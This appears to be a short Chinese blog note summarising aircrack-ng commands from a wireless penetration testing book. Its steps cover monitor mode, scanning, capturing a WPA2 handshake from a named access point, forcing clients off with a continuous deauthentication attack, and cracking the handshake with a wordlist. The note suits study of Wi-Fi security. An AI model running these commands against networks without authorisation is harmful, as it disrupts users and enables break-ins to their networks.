zoukankan      html  css  js  c++  java
  • Wireless Penetration Testing(命令总结)

    1、对本书出现的无线网络涉及的命令做一总结

         查看无线网卡( Create a monitor mode interface using your card as shown in the following screenshot )

        ifconfig -a   

       

     ifconfig wlan0   (开启无线网卡)    airmon-ng start wlan0(开启混杂&监听模式) 

      扫描无线端口 接入点,(Ensure that channel hopping happens across bouth the 802.11 b gan g bands)  使用命令airodump-ng  --band ng --cswitch 1 wlan0mon  或者使用

     ariodump-ng  wlan0mon

    通过是用airodump-ng 发现未授权的用户连接到认证的客户端,访问网络。

      收集需要侦查的无线网络MAC地址对应的流量(握手数据包),airodump-ng -c 1 --bssid  8C:A6:DF:B9:70:81  --write  WPA2  wlan0mon

       对于没有加密公开的WiFi 理论上抓不到到握手包,所以使用抓包的命令时 同时将自己链接的端切换到一个 加密的Ap广播点。抓包的时候要等待一下,出现 WPA handshake 的时候表示抓包成功

      

     对于不容易抓包的广播点 可以采取适当的攻击手段,迫使掉线之后再次抓包 aireplay-ng --deauth 0 -a 8C:A6:DF:B9:70:81 wlan0mon

     使用字典对抓取的握手包进行破解   aircrack-ng -b 8C:A6:DF:B9:70:81 -w words WPA2-01.cap    这里  .cap就是抓取的握手包

       

  • 相关阅读:
    前后端项目结构规范性记录
    开发问题记录(这部分还是比较零碎)
    对HashMap的一次记录
    面试问题记录 三 (JavaWeb、JavaEE)
    面试问题记录 二 (数据库、Linux、Redis)
    面试问题记录 一 (基础部分)
    对正则表达式的一些记录
    WEB与游戏开发的一些区别
    MarkDown常用语法全纪录
    MySQL压测相关内容
  • 原文地址:https://www.cnblogs.com/xinxianquan/p/9568672.html
Copyright © 2011-2022 走看看